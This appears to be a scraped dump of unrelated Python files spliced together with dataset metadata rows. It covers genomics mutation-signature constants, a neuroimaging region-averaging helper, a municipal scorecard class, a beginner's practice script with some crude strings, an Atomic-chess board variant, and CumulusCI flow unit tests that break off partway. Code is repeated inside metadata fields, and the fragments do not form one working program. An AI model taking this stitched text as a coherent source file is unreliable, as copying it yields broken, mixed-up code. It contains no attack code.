ONCOTREE_FILE = os.path.join(OBJ_DIR, ONCOTREE_FILENAME)
PROJ_TO_SIGS_FILE = os.path.join(OBJ_DIR, PROJ_TO_SIGS_FILENAME)
EXPLOSIG_CONNECT_HOST = 'explosig_connect:8200'
CAT_TYPES = [
'SBS_96',
'DBS_78',
'INDEL_Alexandrov2018_83'
]
MUT_TYPES = [
'SBS',
'DBS',
'INDEL'
]
MUT_TYPE_MAP = {
'SBS': 'SBS_96',
'DBS': 'DBS_78',
'INDEL': 'INDEL_Alexandrov2018_83'
}
CAT_TYPE_MAP = dict([(val, key) for key, val in MUT_TYPE_MAP.items()])
# Regular Expressions
CHROMOSOME_RE = r'^(X|Y|M|[1-9]|1[0-9]|2[0-2])$'
# Column names for extended mutation tables
PATIENT = 'Patient'
SAMPLE = 'Sample'
CANCER_TYPE = 'Cancer Type'
PROVENANCE = 'Provenance'
COHORT = 'Cohort'
CHR = 'Chromosome'
POS_START = 'Start Position'
POS_END = 'End Position'
REF = 'Reference Sequence'
VAR = 'Variant Sequence'
GSTRAND = 'Genomic Strand'
SEQ_TYPE = 'Sequencing Strategy'
MUT_TYPE = 'Mutation Type'
ASSEMBLY = 'Assembly Version'
MUT_CLASS = 'Mutation Classification'
GENE_SYMBOL = "Gene Symbol"
FPRIME = "5' Flanking Bases"
TPRIME = "3' Flanking Bases"
TSTRAND = 'Transcriptional Strand'
MUT_DIST = 'Distance to Previous Mutation'
NEAREST_MUT = 'Distance to Nearest Mutation'
MUT_DIST_ROLLING_MEAN = 'Rolling Mean of 6 Mutation Distances'
KATAEGIS = 'Kataegis'
# Special clinical variables
ICD_O_3_SITE_CODE = 'ICD-O-3 Site Code'
ICD_O_3_SITE_DESC = 'ICD-O-3 Site Description'
ICD_O_3_HISTOLOGY_CODE = 'ICD-O-3 Histology Code'
ICD_O_3_HISTOLOGY_DESC = 'ICD-O-3 Histology Description'
SURVIVAL_DAYS_TO_DEATH = 'Days to Death'
SURVIVAL_DAYS_TO_LAST_FOLLOWUP = 'Days to Last Followup'
# Column names for gene expression tables
GENE_EXPRESSION_RNA_SEQ_MRNA_Z = 'RNA Seq v2 mRNA median Zscore'
CHROMOSOMES = {
'1': 249250621,
'2': 243199373,
'3': 198022430,
'4': 191154276,
'5': 180915260,
'6': 171115067,
'7': 159138663,
'8': 146364022,
'9': 141213431,
'10': 135534747,
'11': 135006516,
'12': 133851895,
'13': 115169878,
'14': 107349540,
'15': 102531392,
'16': 90354753,
'17': 81195210,
'18': 78077248,
'19': 59128983,
'20': 63025520,
'21': 48129895,
'22': 51304566,
'X': 155270560,
'Y': 59373566,
'M': 16571
}
class MUT_CLASS_VALS(Enum):
SILENT = "Silent"
MISSENSE = "Missense"
FRAMESHIFT = "Frameshift"
SPLICE_SITE = "Splice Site"
NONSENSE = "Nonsense"
IN_FRAME_INDEL = "in-frame indel"
OTHER = "Other mutation"
NONSTOP = "Nonstop"
TRANSLATION_START_SITE="Translation Start Site"
# Signatures columns
META_COL_SIG = 'Signature'
META_COL_ONCOTREE_CODE = 'Oncotree Code'
META_COL_CANCER_TYPE = 'Cancer Type'
META_COL_CAT_TYPE = 'Category Type'
META_COL_DESCRIPTION = 'Description'
META_COL_INDEX = 'Index'
META_COL_SIG_GROUP = 'Signature Group'
META_COL_PUBLICATION = 'Publication'
META_COL_PATH_SIGS_META = 'Path to Meta File'
META_COL_PATH_SIGS_DATA = 'Path to Signatures {cat_type} File'
META_COL_PATH_SIGS_CANCER_TYPE_MAP = 'Path to Cancer Type Map File'
META_COL_PATH_SIGS_DATA_LIST = [META_COL_PATH_SIGS_DATA.format(cat_type=val) for val in CAT_TYPES]
META_SIGS_FILE_COLS = [
META_COL_PATH_SIGS_META,
META_COL_PATH_SIGS_CANCER_TYPE_MAP
] + META_COL_PATH_SIGS_DATA_LIST
META_SIGS_COLS = [
META_COL_SIG,
META_COL_DESCRIPTION,
META_COL_INDEX,
META_COL_CAT_TYPE
]
META_CANCER_TYPE_MAP_COLS = [
META_COL_SIG,
META_COL_ONCOTREE_CODE,
META_COL_CANCER_TYPE,
META_COL_CAT_TYPE
]
# Mutation data columns
META_COL_PROJ = 'Project'
META_COL_PROJ_SOURCE = 'Project Source'
META_COL_PROJ_NAME = 'Project Name'
META_COL_PATH_MUTS_COUNTS = 'Path to Counts {cat_type} File'
META_COL_PATH_CLINICAL = 'Path to Clinical File'
META_COL_PATH_SAMPLES = 'Path to Samples File'
META_COL_PATH_GENE_MUT = 'Path to Gene Mutation File'
META_COL_PATH_GENE_EXP = 'Path to Gene Expression File'
META_COL_PATH_GENE_CNA = 'Path to Gene CNA File'
META_COL_PATH_MUTS_COUNTS_LIST = [META_COL_PATH_MUTS_COUNTS.format(cat_type=val) for val in CAT_TYPES]
META_DATA_FILE_COLS = [
META_COL_PATH_CLINICAL,
META_COL_PATH_SAMPLES,
META_COL_PATH_GENE_MUT,
META_COL_PATH_GENE_EXP,
META_COL_PATH_GENE_CNA
] + META_COL_PATH_MUTS_COUNTS_LIST
# Pathways data columns
META_COL_PATHWAYS_GROUP = 'Pathways Group'
META_COL_PATH_PATHWAYS = 'Path to Pathways File'
META_PATHWAYS_FILE_COLS = [
META_COL_PATH_PATHWAYS
]
# Clinical variables columns
META_COL_CLINICAL_COL = 'Clinical Column'
META_COL_CLINICAL_SCALE_TYPE = 'Scale Type'
META_COL_CLINICAL_EXTENT = 'Extent'
META_COL_CLINICAL_VALUE = 'Value'
# Tri-counts data columns
META_COL_TRICOUNTS_METHOD = 'Method'
META_COL_PATH_TRICOUNTS = 'Path to Trinucleotide Counts File'
META_TRICOUNTS_FILE_COLS = [
META_COL_PATH_TRICOUNTS
] | en | 0.396747 | # Regular Expressions # Column names for extended mutation tables # Special clinical variables # Column names for gene expression tables # Signatures columns # Mutation data columns # Pathways data columns # Clinical variables columns # Tri-counts data columns | 1.916264 | 2 |
niftypad/image_process/regions.py | JJiao/NiftyPAD | 0 | 6632467 | __author__ = '<NAME>'
__email__ = "<EMAIL>"
import numpy as np
import nibabel as nib
def extract_regional_values(image, parcellation, labels):
idx = labels_to_index(parcellation, labels)
regional_values = np.mean(image[idx, ], axis=0)
return regional_values
def labels_to_index(parcellation, labels):
parcellation = np.squeeze(parcellation)
idx = np.zeros(parcellation.shape, dtype='bool')
for i in range(len(labels)):
idx = np.logical_or(idx, parcellation == labels[i])
return idx
def extract_regional_values_image_file(image_file, parcellation_file):
image = nib.load(image_file)
image_data = image.get_data()
n_frames = 1
if image_data.ndim == 4:
n_frames = image_data.shape[-1]
parcellation_img = nib.load(parcellation_file)
parcellation = parcellation_img.get_data()
regions_label = np.unique(parcellation)
regions_data = np.zeros((regions_label.size, n_frames))
regions_data = np.squeeze(regions_data)
for i in range(regions_label.size):
regions_data[i] = extract_regional_values(image_data, parcellation, [regions_label[i]])
return regions_data, regions_label
| __author__ = '<NAME>'
__email__ = "<EMAIL>"
import numpy as np
import nibabel as nib
def extract_regional_values(image, parcellation, labels):
idx = labels_to_index(parcellation, labels)
regional_values = np.mean(image[idx, ], axis=0)
return regional_values
def labels_to_index(parcellation, labels):
parcellation = np.squeeze(parcellation)
idx = np.zeros(parcellation.shape, dtype='bool')
for i in range(len(labels)):
idx = np.logical_or(idx, parcellation == labels[i])
return idx
def extract_regional_values_image_file(image_file, parcellation_file):
image = nib.load(image_file)
image_data = image.get_data()
n_frames = 1
if image_data.ndim == 4:
n_frames = image_data.shape[-1]
parcellation_img = nib.load(parcellation_file)
parcellation = parcellation_img.get_data()
regions_label = np.unique(parcellation)
regions_data = np.zeros((regions_label.size, n_frames))
regions_data = np.squeeze(regions_data)
for i in range(regions_label.size):
regions_data[i] = extract_regional_values(image_data, parcellation, [regions_label[i]])
return regions_data, regions_label
| none | 1 | 2.540958 | 3 |
|
scorecard/profile_data/indicators/series.py | Code4SA/municipal-data-api | 0 | 6632468 | <filename>scorecard/profile_data/indicators/series.py
class SeriesIndicator():
@classmethod
def get_muni_specifics(cls, api_data):
results = api_data.results
years = api_data.years
return {
"result_type": cls.result_type,
"values": cls.get_values(years, results),
"ref": api_data.references[cls.reference],
"last_year": years[0] if len(years) > 0 else None,
"formula": cls.formula,
"formula_v2": cls.formula_v2,
}
| <filename>scorecard/profile_data/indicators/series.py
class SeriesIndicator():
@classmethod
def get_muni_specifics(cls, api_data):
results = api_data.results
years = api_data.years
return {
"result_type": cls.result_type,
"values": cls.get_values(years, results),
"ref": api_data.references[cls.reference],
"last_year": years[0] if len(years) > 0 else None,
"formula": cls.formula,
"formula_v2": cls.formula_v2,
}
| none | 1 | 2.563543 | 3 |
|
testGroup.py | Zoushangjie/python-code | 0 | 6632469 | import numpy as np
if 0:
number = [1, 2, 3]
print(number)
number.append(9)
print(number)
number.append("hhh")
print(number)
number.extend([5, 3, 6, 8])
print(number)
number.insert(0, "StartsHere")
print(number)
number.remove(3)
print(number)
number.remove(3)
print(number)
del number[2]
print(number)
a = number.pop()
print(a)
b = number.pop(2)
print(b)
c = number.pop(2)
print(c)
if(0):
num=[5,"bulshit",4,3,7,9,6,0,"fuckyall"]
a=num.pop()
b=num.pop()
c=num.pop()
print(a)
print(b)
print(c)
d=num.pop(1)
print(d)
#The next block is the demon of list slicing
if(0):
yo=[1,2,3,"you are so nice",5,"love you!"]
q=yo[:2]
print(q)
p=yo[0:2]
print(p)
print(yo[1:2]) #"start and print from here and stop before the next No."
print(yo[2:]) # Ah, actually, this method is "start and print from here until the last"
# Now I am going to add the third parameter: step distnce--bu chang in Chinese
print(yo[1:5:3])
print(yo[1:5:2]) # start at [1] and stop before [5], two "steps" as a step. If the "window" is out of the list, there will be no output at that step
# Duang, there's a special method: reverse the list
print(yo[::-1])
if(0):
# fen pian copy
list1=[1,2,9,3,7]
list2=list1[:] # copy and preserve
list3=list1
list1.sort()
print(list1)
print(list2)
print(list3)
# tuple
if(0):
temp=(1)
print(type(temp))
temp=(1,)
type(temp)
print(type(temp))
# the key of tuple is ","
temp=("jj","yy","ee")
temp=temp[:2]+("mua",)+temp[2:]
print(temp)
temp=temp[:2]+temp[3:]
print(temp)
# add and delet
#del temp
#print(temp)
str1="I love you my daring"
str1=str1[:10]
print(str1)
print(str1[5])
str2="I love you my daring"
str2=str2.replace("daring","girl")
print(str2)
if(0):
list4=[1,3,5,6,4,8,7]#"a","Bioinformatics","paper","APS","CityU","Accept"
temp = list4[0]
for each in list4:
if each>temp:
temp=each
print(temp)
if(0):
def multi(a,b,c,d):
"""This function can do the formulation a+b*c-d"""
print(a+b*c-d)
multi(12,34,56,78)
print(multi.__doc__) # doc for the function
#key word parameter and mo ren parameter
def nutri(name="protein",word="good"):
print(name+" "+word)
print(nutri())
print(nutri("sugar","less"))
def changeAble(*params):
print("have %d parameters" % len(params))
print("the second param is:", params[1]) # be care of here. if params are int, don't use '+', use ','
print(changeAble("I",'love','you','babe'))
# release package
a=[1,2,3,4,5]
print(changeAble(*a))
if(0):
def discount(price,rate):
final_price = price * rate
return final_price
original_price = float(input('please enter the ori price:'))
rate = float(input('please enter discount:'))/100
newprice = discount(original_price,rate)
print('After discount is:', newprice)
if (0):
def Total_price(numOfGoods):
original_price = float(input('Please enter the original price:'))
disccount = float(input('Enter discount:')) / 10
def single_price(origin_Single_price,rate):
final_price = origin_Single_price*rate
return final_price
total_price = single_price(original_price, disccount) * numOfGoods
return total_price
numOfGoods=float(input('Enter number of goods:'))
total=Total_price(numOfGoods)
print(total)
if (0):
student=['zoushangjie','xiaopengyou']
programme=['Genomics and bioinformatics in CUHK','666']
print(programme.index('Genomics and bioinformatics in CUHK'))
print("zoushangjie:", programme[student.index('zoushangjie')])
dict_master={'zoushangjie':'Genomics and bioinformatics in CUHK',"lin":'PKU'}
print(dict_master['zoushangjie'])
dict_master[1]='TSU'
print(dict_master)
dict_master['Lin']='TSU'
print(dict_master)
dict_master.update(Lin='PKU Medical') # No '' on key !!??
print(dict_master)
if (0):
list1=[1,1,2,4,5,77,8,77]
print(list1)
list1=list(set(list1)) # set can remove repeated values
print(list1) | import numpy as np
if 0:
number = [1, 2, 3]
print(number)
number.append(9)
print(number)
number.append("hhh")
print(number)
number.extend([5, 3, 6, 8])
print(number)
number.insert(0, "StartsHere")
print(number)
number.remove(3)
print(number)
number.remove(3)
print(number)
del number[2]
print(number)
a = number.pop()
print(a)
b = number.pop(2)
print(b)
c = number.pop(2)
print(c)
if(0):
num=[5,"bulshit",4,3,7,9,6,0,"fuckyall"]
a=num.pop()
b=num.pop()
c=num.pop()
print(a)
print(b)
print(c)
d=num.pop(1)
print(d)
#The next block is the demon of list slicing
if(0):
yo=[1,2,3,"you are so nice",5,"love you!"]
q=yo[:2]
print(q)
p=yo[0:2]
print(p)
print(yo[1:2]) #"start and print from here and stop before the next No."
print(yo[2:]) # Ah, actually, this method is "start and print from here until the last"
# Now I am going to add the third parameter: step distnce--bu chang in Chinese
print(yo[1:5:3])
print(yo[1:5:2]) # start at [1] and stop before [5], two "steps" as a step. If the "window" is out of the list, there will be no output at that step
# Duang, there's a special method: reverse the list
print(yo[::-1])
if(0):
# fen pian copy
list1=[1,2,9,3,7]
list2=list1[:] # copy and preserve
list3=list1
list1.sort()
print(list1)
print(list2)
print(list3)
# tuple
if(0):
temp=(1)
print(type(temp))
temp=(1,)
type(temp)
print(type(temp))
# the key of tuple is ","
temp=("jj","yy","ee")
temp=temp[:2]+("mua",)+temp[2:]
print(temp)
temp=temp[:2]+temp[3:]
print(temp)
# add and delet
#del temp
#print(temp)
str1="I love you my daring"
str1=str1[:10]
print(str1)
print(str1[5])
str2="I love you my daring"
str2=str2.replace("daring","girl")
print(str2)
if(0):
list4=[1,3,5,6,4,8,7]#"a","Bioinformatics","paper","APS","CityU","Accept"
temp = list4[0]
for each in list4:
if each>temp:
temp=each
print(temp)
if(0):
def multi(a,b,c,d):
"""This function can do the formulation a+b*c-d"""
print(a+b*c-d)
multi(12,34,56,78)
print(multi.__doc__) # doc for the function
#key word parameter and mo ren parameter
def nutri(name="protein",word="good"):
print(name+" "+word)
print(nutri())
print(nutri("sugar","less"))
def changeAble(*params):
print("have %d parameters" % len(params))
print("the second param is:", params[1]) # be care of here. if params are int, don't use '+', use ','
print(changeAble("I",'love','you','babe'))
# release package
a=[1,2,3,4,5]
print(changeAble(*a))
if(0):
def discount(price,rate):
final_price = price * rate
return final_price
original_price = float(input('please enter the ori price:'))
rate = float(input('please enter discount:'))/100
newprice = discount(original_price,rate)
print('After discount is:', newprice)
if (0):
def Total_price(numOfGoods):
original_price = float(input('Please enter the original price:'))
disccount = float(input('Enter discount:')) / 10
def single_price(origin_Single_price,rate):
final_price = origin_Single_price*rate
return final_price
total_price = single_price(original_price, disccount) * numOfGoods
return total_price
numOfGoods=float(input('Enter number of goods:'))
total=Total_price(numOfGoods)
print(total)
if (0):
student=['zoushangjie','xiaopengyou']
programme=['Genomics and bioinformatics in CUHK','666']
print(programme.index('Genomics and bioinformatics in CUHK'))
print("zoushangjie:", programme[student.index('zoushangjie')])
dict_master={'zoushangjie':'Genomics and bioinformatics in CUHK',"lin":'PKU'}
print(dict_master['zoushangjie'])
dict_master[1]='TSU'
print(dict_master)
dict_master['Lin']='TSU'
print(dict_master)
dict_master.update(Lin='PKU Medical') # No '' on key !!??
print(dict_master)
if (0):
list1=[1,1,2,4,5,77,8,77]
print(list1)
list1=list(set(list1)) # set can remove repeated values
print(list1) | en | 0.825459 | #The next block is the demon of list slicing #"start and print from here and stop before the next No." # Ah, actually, this method is "start and print from here until the last" # Now I am going to add the third parameter: step distnce--bu chang in Chinese # start at [1] and stop before [5], two "steps" as a step. If the "window" is out of the list, there will be no output at that step # Duang, there's a special method: reverse the list # fen pian copy # copy and preserve # tuple # the key of tuple is "," # add and delet #del temp #print(temp) #"a","Bioinformatics","paper","APS","CityU","Accept" This function can do the formulation a+b*c-d # doc for the function #key word parameter and mo ren parameter # be care of here. if params are int, don't use '+', use ',' # release package # No '' on key !!?? # set can remove repeated values | 4.25113 | 4 |
pychess/Variants/atomic.py | jacobchrismarsh/chess_senior_project | 0 | 6632470 | # Atomic Chess
from pychess.Utils.const import (
VARIANTS_OTHER_NONSTANDARD,
KING,
ATOMICCHESS,
ENPASSANT,
B8,
E1,
)
from pychess.Utils.Board import Board
from pychess.Utils.Cord import Cord
from pychess.Utils.Move import Move
from pychess.Utils.lutils.bitboard import iterBits
from pychess.Utils.lutils.ldata import moveArray
class AtomicBoard(Board):
variant = ATOMICCHESS
__desc__ = _("FICS atomic: http://www.freechess.org/Help/HelpFiles/atomic.html")
name = _("Atomic")
cecp_name = "atomic"
need_initial_board = False
standard_rules = False
variant_group = VARIANTS_OTHER_NONSTANDARD
def cordsAround(cord):
kingMoves = moveArray[KING]
for co_ord in iterBits(kingMoves[cord.cord]):
yield Cord(co_ord)
def piecesAround(board, cord):
kingMoves = moveArray[KING]
friends = board.friends[board.color]
for co_ord in iterBits(kingMoves[cord] & friends):
yield co_ord, board.arBoard[co_ord], board.color
enemies = board.friends[1 - board.color]
for co_ord in iterBits(kingMoves[cord] & enemies):
yield co_ord, board.arBoard[co_ord], 1 - board.color
def kingExplode(board, move, color):
tcord = move & 63
# fcord = (move >> 6) & 63
flag = move >> 12
if board.arBoard[tcord] or flag == ENPASSANT:
for acord, apiece, acolor in piecesAround(board, tcord):
if apiece == KING and acolor == color:
return True
return False
if __name__ == "__main__":
FEN = "rnbqkbnr/ppp1pppp/8/8/8/8/PPPPPPPP/RNBQKBNR b KQkq - 0 1"
atomic_board = AtomicBoard(FEN)
print(atomic_board.board.__repr__())
for acord, apiece, acolor in piecesAround(atomic_board.board, B8):
print(acord, apiece, acolor)
for acord, apiece, acolor in piecesAround(atomic_board.board, E1):
print(acord, apiece, acolor)
from pychess.Utils.lutils.lmove import parseAN
atomic_board = atomic_board.move(Move(parseAN(atomic_board.board, "d8d2")))
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
atomic_board.board.popMove()
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
| # Atomic Chess
from pychess.Utils.const import (
VARIANTS_OTHER_NONSTANDARD,
KING,
ATOMICCHESS,
ENPASSANT,
B8,
E1,
)
from pychess.Utils.Board import Board
from pychess.Utils.Cord import Cord
from pychess.Utils.Move import Move
from pychess.Utils.lutils.bitboard import iterBits
from pychess.Utils.lutils.ldata import moveArray
class AtomicBoard(Board):
variant = ATOMICCHESS
__desc__ = _("FICS atomic: http://www.freechess.org/Help/HelpFiles/atomic.html")
name = _("Atomic")
cecp_name = "atomic"
need_initial_board = False
standard_rules = False
variant_group = VARIANTS_OTHER_NONSTANDARD
def cordsAround(cord):
kingMoves = moveArray[KING]
for co_ord in iterBits(kingMoves[cord.cord]):
yield Cord(co_ord)
def piecesAround(board, cord):
kingMoves = moveArray[KING]
friends = board.friends[board.color]
for co_ord in iterBits(kingMoves[cord] & friends):
yield co_ord, board.arBoard[co_ord], board.color
enemies = board.friends[1 - board.color]
for co_ord in iterBits(kingMoves[cord] & enemies):
yield co_ord, board.arBoard[co_ord], 1 - board.color
def kingExplode(board, move, color):
tcord = move & 63
# fcord = (move >> 6) & 63
flag = move >> 12
if board.arBoard[tcord] or flag == ENPASSANT:
for acord, apiece, acolor in piecesAround(board, tcord):
if apiece == KING and acolor == color:
return True
return False
if __name__ == "__main__":
FEN = "rnbqkbnr/ppp1pppp/8/8/8/8/PPPPPPPP/RNBQKBNR b KQkq - 0 1"
atomic_board = AtomicBoard(FEN)
print(atomic_board.board.__repr__())
for acord, apiece, acolor in piecesAround(atomic_board.board, B8):
print(acord, apiece, acolor)
for acord, apiece, acolor in piecesAround(atomic_board.board, E1):
print(acord, apiece, acolor)
from pychess.Utils.lutils.lmove import parseAN
atomic_board = atomic_board.move(Move(parseAN(atomic_board.board, "d8d2")))
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
atomic_board.board.popMove()
print(atomic_board.board.__repr__())
print(atomic_board.board.pieceCount)
| en | 0.763947 | # Atomic Chess # fcord = (move >> 6) & 63 | 2.561276 | 3 |
cumulusci/core/tests/test_flows.py | 1handclapping/CumulusCI | 0 | 6632471 | <reponame>1handclapping/CumulusCI<gh_stars>0
""" Tests for the Flow engine """
import unittest
import logging
import mock
from collections import Callable
from cumulusci.core.flows import BaseFlow
from cumulusci.core.tasks import BaseTask
from cumulusci.core.config import FlowConfig
from cumulusci.core.config import OrgConfig
from cumulusci.core.exceptions import FlowConfigError
from cumulusci.core.exceptions import FlowInfiniteLoopError
from cumulusci.core.exceptions import FlowNotReadyError
from cumulusci.core.exceptions import TaskNotFoundError
from cumulusci.core.tests.utils import MockLoggingHandler
from cumulusci.tests.util import create_project_config
import cumulusci.core
ORG_ID = "00D000000000001"
class _TaskReturnsStuff(BaseTask):
def _run_task(self):
self.return_values = {"name": "supername"}
class _TaskResponseName(BaseTask):
task_options = {"response": {"description": "the response to print"}}
def _run_task(self):
return self.options["response"]
class _TaskRaisesException(BaseTask):
task_options = {
"exception": {"description": "The exception to raise"},
"message": {"description": "The exception message"},
}
def _run_task(self):
raise self.options["exception"](self.options["message"])
class _SfdcTask(BaseTask):
salesforce_task = True
def _run_task(self):
return -1
@mock.patch("cumulusci.core.flows.BaseFlow._init_org")
class TestBaseFlow(unittest.TestCase):
""" Tests the expectations of a BaseFlow caller """
@classmethod
def setUpClass(cls):
super(TestBaseFlow, cls).setUpClass()
logger = logging.getLogger(cumulusci.core.__name__)
logger.setLevel(logging.DEBUG)
cls._flow_log_handler = MockLoggingHandler(logging.DEBUG)
logger.addHandler(cls._flow_log_handler)
def setUp(self):
self.project_config = create_project_config("TestOwner", "TestRepo")
self.project_config.config["tasks"] = {
"pass_name": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskReturnsStuff",
},
"name_response": {
"description": "Pass the name",
"class_path": "cumulusci.core.tests.test_flows._TaskResponseName",
},
"raise_exception": {
"description": "Raises an exception",
"class_path": "cumulusci.core.tests.test_flows._TaskRaisesException",
"options": {
"exception": Exception,
"message": "Test raised exception as expected",
},
},
"sfdc_task": {
"description": "An sfdc task",
"class_path": "cumulusci.core.tests.test_flows._SfdcTask",
},
}
self.project_config.config["flows"] = {
"nested_flow": {
"description": "A flow that runs inside another flow",
"steps": {1: {"task": "pass_name"}},
},
"nested_flow_2": {
"description": "A flow that runs inside another flow, and calls another flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
},
}
self.org_config = OrgConfig(
{"username": "<EMAIL>", "org_id": ORG_ID}, "test"
)
self._flow_log_handler.reset()
self.flow_log = self._flow_log_handler.messages
def test_init(self, mock_class):
""" BaseFlow initializes and offers a logger """
flow_config = FlowConfig({})
mock_class.return_value = None
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertEqual(hasattr(flow, "logger"), True)
def test_is_callable(self, mock_class):
""" BaseFlow exposes itself as a callable for use """
flow_config = FlowConfig({})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsInstance(flow, Callable)
def test_pass_around_values(self, mock_class):
""" A flow's options reach into return values from other tasks. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
# run the flow
flow()
# the flow results for the second task should be 'name'
self.assertEqual("supername", flow.step_results[1])
def test_task_options(self, mock_class):
""" A flow can accept task options and pass them to the task. """
mock_class.return_value = None
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "name_response", "options": {"response": "foo"}}},
}
)
flow = BaseFlow(
self.project_config,
flow_config,
self.org_config,
options={"name_response__response": "bar"},
)
# run the flow
flow()
# the flow results for the first task should be 'bar'
self.assertEqual("bar", flow.step_results[0])
def test_skip_kwarg(self, mock_class):
""" A flow can receive during init a list of tasks to skip """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_skip_task_value_none(self, mock_class):
""" A flow skips any tasks whose name is None to allow override via yaml """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "None"}},
}
)
flow = BaseFlow(
self.project_config, flow_config, self.org_config, skip=["name_response"]
)
# run the flow
flow()
# the number of tasks in the flow should be 1 instead of 2
self.assertEqual(1, len(flow.step_results))
def test_find_step_by_name_no_steps(self, mock_class):
""" Running a flow with no steps throws an error """
# instantiate a flow with two tasks
flow_config = FlowConfig({"description": "Run two tasks"})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertIsNone(flow._find_step_by_name("task"))
with self.assertRaises(FlowConfigError):
flow()
def test_find_step_by_name_not_first(self, mock_class):
""" The _find_step_by_name method skips tasks that don't exist """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"task": "pass_name"},
2: {
"task": "name_response",
"options": {"response": "^^pass_name.name"},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
self.assertEqual(
"cumulusci.core.tests.test_flows._TaskResponseName",
task.task_config.class_path,
)
def test_find_step_by_name__flow(self, mock_class):
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {
1: {"flow": "nested_flow"},
2: {
"task": "name_response",
"options": {
"response": "^^nested_flow.pass_name.name",
"from_flow": "^^nested_flow.name",
},
},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
step = flow._find_step_by_name("nested_flow")
self.assertIsInstance(step, BaseFlow)
def test_render_task_config_empty_value(self, mock_class):
""" The _render_task_config method skips option values of None """
# instantiate a flow with two tasks
flow_config = FlowConfig(
{
"description": "Run a tasks",
"steps": {1: {"task": "name_response", "options": {"response": None}}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
task = flow._find_step_by_name("name_response")
config = flow._render_task_config(task)
self.assertEqual(["Options:"], config)
def test_task_raises_exception_fail(self, mock_class):
""" A flow aborts when a task raises an exception """
flow_config = FlowConfig(
{"description": "Run a task", "steps": {1: {"task": "raise_exception"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
self.assertRaises(Exception, flow)
def test_task_raises_exception_ignore(self, mock_class):
""" A flow continues when a task configured with ignore_failure raises an exception """
flow_config = FlowConfig(
{
"description": "Run a task",
"steps": {
1: {"task": "raise_exception", "ignore_failure": True},
2: {"task": "pass_name"},
},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(2, len(flow.steps))
def test_call_no_tasks(self, mock_class):
""" A flow with no tasks will have no responses. """
flow_config = FlowConfig({"description": "Run no tasks", "steps": {}})
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual([], flow.step_return_values)
self.assertEqual([], flow.steps)
def test_call_one_task(self, mock_class):
""" A flow with one task will execute the task """
flow_config = FlowConfig(
{"description": "Run one task", "steps": {1: {"task": "pass_name"}}}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertTrue(
any("Flow Description: Run one task" in s for s in self.flow_log["info"])
)
self.assertEqual([{"name": "supername"}], flow.step_return_values)
self.assertEqual(1, len(flow.steps))
def test_call_many_tasks(self, mock_class):
""" A flow with many tasks will dispatch each task """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
self.assertEqual(
[{"name": "supername"}, {"name": "supername"}], flow.step_return_values
)
self.assertEqual(2, len(flow.steps))
def test_call_task_not_found(self, mock_class):
""" A flow with reference to a task that doesn't exist in the
project will throw a TaskNotFoundError """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "do_delightulthings"}},
}
)
with self.assertRaises(TaskNotFoundError):
flow = BaseFlow(self.project_config, flow_config, self.org_config)
def test_flow_prints_org_id(self, mock_class):
""" A flow with an org prints the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_flow_no_org_no_org_id(self, mock_class):
""" A flow without an org does not print the org ID """
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "pass_name"}, 2: {"task": "pass_name"}},
}
)
flow = BaseFlow(self.project_config, flow_config, None)
flow()
self.assertFalse(any(ORG_ID in s for s in self.flow_log["info"]))
def test_flow_prints_org_id_once_only(self, mock_class):
""" A flow with sf tasks prints the org ID only once."""
flow_config = FlowConfig(
{
"description": "Run two tasks",
"steps": {1: {"task": "sfdc_task"}, 2: {"task": "sfdc_task"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
org_id_logs = [s for s in self.flow_log["info"] if ORG_ID in s]
self.assertEqual(1, len(org_id_logs))
def test_nested_flow(self, mock_class):
""" Flows can run inside other flows """
flow_config = FlowConfig(
{
"description": "Run a task and a flow",
"steps": {1: {"task": "pass_name"}, 2: {"flow": "nested_flow"}},
}
)
flow = BaseFlow(self.project_config, flow_config, self.org_config)
flow()
